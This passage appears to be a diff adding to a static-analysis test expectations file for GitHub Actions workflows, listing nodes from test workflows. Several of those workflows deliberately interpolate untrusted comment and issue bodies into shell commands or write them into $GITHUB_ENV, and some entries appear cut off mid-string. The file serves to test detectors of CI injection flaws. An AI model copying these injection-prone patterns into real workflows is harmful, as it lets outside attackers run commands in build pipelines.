.github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| 
.github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| 
.github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| 
.github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | 
.github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | 
.github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | 
.github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 
| github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| 
.github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| 
grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | +| .github/workflows/multiline.yml:30:14:33:14 | cat 
<<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | .github/workflows/multiline.yml@34:9:40:6 | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | +| 